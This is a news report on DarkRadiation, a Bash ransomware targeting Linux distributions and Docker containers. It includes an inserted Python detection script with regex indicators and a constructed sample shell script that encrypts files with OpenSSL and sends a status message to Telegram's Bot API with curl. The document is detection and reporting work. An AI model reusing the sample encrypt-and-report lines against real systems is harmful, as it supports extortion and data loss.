DarkRadiation ransomware targeting RedHat, Debian Linux distributions


The newly discovered DarkRadiation ransomware chain is unlike any other ransomware family.


Trend Micro cybersecurity researchers have shared findings of a newly identified ransomware strain dubbed DarkRadiation. The ransomware strain is entirely written in Bash, and this aspect makes it difficult for most security software to detect it as a threat.




Its primary targets are Linux and Docker Cloud containers, which is particularly concerning for enterprises. Moreover, it relies on Telegram to initiate communication with its C&C server.



“The ransomware … targets Red Hat/CentOS and Debian Linux distributions. The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s),” researchers noted in their report.
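A defender-side illustration of the two behaviours quoted above, added here and not taken from Trend Micro's report or from the malware: a Python triage function that flags shell scripts combining OpenSSL AES-CBC encryption with calls to Telegram's Bot API. The regexes, the verdict labels and the sample scripts are assumptions constructed for this example.

```python
import re

# Heuristics below are assumptions built only from the behaviours the report
# names: a Bash script, OpenSSL AES in CBC mode, and calls to Telegram's API.
SHELL = re.compile(r"^#!.*\b(?:ba)?sh\b")
AES_CBC = re.compile(r"\baes-(?:128|192|256)-cbc\b", re.I)
DECRYPT = re.compile(r"(?:^|\s)-d(?:\s|$)")
TELEGRAM = re.compile(r"https?://api\.telegram\.org/bot", re.I)

def logical_lines(script):
    """Join backslash continuations, then drop blank and comment-only lines."""
    joined = re.sub(r"\\\r?\n", " ", script)
    return [l.strip() for l in joined.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]

def triage(script):
    """Return a verdict plus the lines that triggered each indicator."""
    hits = {"aes_cbc_encrypt": [], "telegram_api": []}
    for line in logical_lines(script):
        if "openssl" in line and AES_CBC.search(line) and not DECRYPT.search(line):
            hits["aes_cbc_encrypt"].append(line)
        if TELEGRAM.search(line):
            hits["telegram_api"].append(line)
    if SHELL.match(script) and all(hits.values()):
        verdict = "high"      # both behaviours in one shell script
    elif any(hits.values()):
        verdict = "review"    # one behaviour alone is common in benign scripts
    else:
        verdict = "none"
    return {"verdict": verdict, **hits}

# Constructed samples (not DarkRadiation code; paths and variables are made up).
SUSPECT = r"""#!/bin/bash
openssl enc -aes-256-cbc -salt \
  -pass pass:"$K" -in "$f" -out "$f.enc"
curl -s "https://api.telegram.org/bot$T/sendMessage" -d text="status"
"""
BACKUP = r"""#!/bin/sh
# nightly backup
tar cz /etc | openssl enc -aes-256-cbc -pbkdf2 -pass file:/root/.bk -out /backup/etc.tgz.enc
"""
RESTORE = r"""#!/bin/sh
openssl enc -d -aes-256-cbc -pbkdf2 -pass file:/root/.bk -in /backup/etc.tgz.enc | tar xz
"""

if __name__ == "__main__":
    for name, s in (("suspect", SUSPECT), ("backup", BACKUP), ("restore", RESTORE)):
        print(name, triage(s)["verdict"])
```

The backup sample shows why neither indicator is sufficient alone: legitimate scripts encrypt with `openssl enc` routinely, so only the combination is scored "high".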



About DarkRadiation Ransomware


The ransomware was first detected by Twitter user @r3dbU7z on 28 May. Later, it was analyzed by Trend Micro researchers. It is reported that the ransomware was discovered as part of a range of hacker tools through VirusTotal. The tools were hosted on the threat actor’s infrastructure in a directory titled “api_attack.”

Currently, there is no information on the ransomware’s delivery methods and no evidence of in-the-wild attacks. However, after assessing its different components, researchers noted that the developers intend to use it against Linux installs and Docker containers.





DarkRadiation ransomware’s ransom note



DarkRadiat ..
